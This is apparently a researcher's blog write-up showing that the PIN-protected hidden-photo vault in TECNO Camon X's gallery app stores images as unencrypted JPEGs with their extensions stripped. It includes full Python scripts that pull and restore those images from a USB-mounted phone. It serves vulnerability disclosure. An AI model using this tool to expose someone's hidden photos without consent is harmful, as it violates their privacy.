Bypassing Gallary3D (Hidden Images Feature) In TECNO Camon X

A lil' Bit About It

This is something that I challenged my self to do, I had a TECNO Camon X CA7 Model, which is a smart phone and basically in all TECNO smart phone models, there is a feature that allows the user to hide images. I had to hide in some of the images and then I set a pin that I shall use to unlock the vault for hiding my images. A question flew into my mind "What If I dont know the pin??" Then I dared my self to take this challenge to research on this petty feature!

Let The Fun Begin

As seen, it asks for a pin, so as we can preview what's in the hidden album.

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

We can either bruteforce manually to get the pin since it's a 4 digits pin which will obviously be time consuming, but worth it eventually. Or we can decide to know where the image is then saved to after being sent to the hidden album.

Connecting the smartphone to my laptop, and enabling the transfer of files, will allow me to view all folders in the system.

Looking For The Files

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

while enumerating through the folders, I was able to get a folder in /Android/data/com.android.gallery3d which looked interesting:

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

This is getting even more interesting :) Opening up .privatealbum, there is another folder named .encryptfiles and it contains the images that we had imported earlier to the hidden vault.

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

The images aren't really images, in this case, I pull the file to my local machine for even further analysis thinking that there might be some sort of encryption working behind all this. Unfortunately my Kali was off so I had to use cyberchef for some quick analysis over this file:

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Now this was even easyyyy! The file type is "image/jpeg"

Getting The Image Back To Normal

Ezpizi, The easiest way to get the image back viewable is to just adding an image extension to the file, and we are able to view the image;

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Automating The Exploit

With all that clear, I decided to write an exploit script to automate all the processes, and retrieve any hidden image that is available in the smartphone! The link to the exploit is : Gallery3D Tecno Exploit, Apart from just the exploit, there is also an android APK file that extracts the hidden images.

Below is the functions.py:

# author : @tahaafarooq
# date : 22/09/2023
# desc : pewpew

import os
import shutil
import platform
import mimetypes


# check operating system
def check_os():
    system = platform.system()
    if system == "Windows":
        return "Windows"
    elif system == "Linux":
        return "Linux"


class RunExploit(object):
    def __init__(self):
        self.author = "@tahaafarooq"

    def check_hidden_image_folder(self, path):
        folder = f"{path}/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles/"
        if os.path.exists(folder):
            return "Found"
        else:
            return "Not Found"

    def unhide_images(self, path, destination):
        folder = f"{path}/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles/"
        files = os.listdir(folder)

        for file in files:
            sf_path = os.path.join(folder, file)

            mt, _ = mimetypes.guess_type(sf_path)

            if mt:
                ext = mimetypes.guess_extension(mt)
                if ext:
                    new_file_name = f"{os.path.splitext(file)[0]}{ext}"
                    df_path = os.path.join(destination, new_file_name)
                else:
                    df_path = os.path.join(destination, file)
            else:
                df_path = os.path.join(destination, file)

            shutil.copy(sf_path, df_path)

        print("Images Unhidden! Abracadabra!")

        return "Done"

Below is run.py:

# author : @tahaafarooq
# date : 22/09/2023
# desc : pewpew

import sys
from functions import RunExploit, check_os

if __name__ == "__main__":
    operating_system = check_os()
    if operating_system == "Windows":
        print("Sorry Mate! This Script Doesn't Run On Windows Yet!")
        sys.exit(0)
    elif operating_system == "Linux":
        source_path = input("Please Enter Your Mobile Mounted Path : ")
        dest_path = input("Please Enter Path To Save Unhidden Images (/home/kali/Documents/) : ")

        check_app_avlb = RunExploit().check_hidden_image_folder(source_path)

        if check_app_avlb == "Found":
            print("Revealing Hidden Images Now...")
            proc_unhide = RunExploit().unhide_images(source_path, dest_path)
            if proc_unhide == "Done":
                print(f"Please Open {dest_path} To View The Images")
            else:
                print("Unable To Reveal Images")
        else:
            print("Oops! Looks Like This Model Doesn't Have The Feature!")

Unfortunately didn't get any bounty on this since the device model is out of scope :( But PewPew!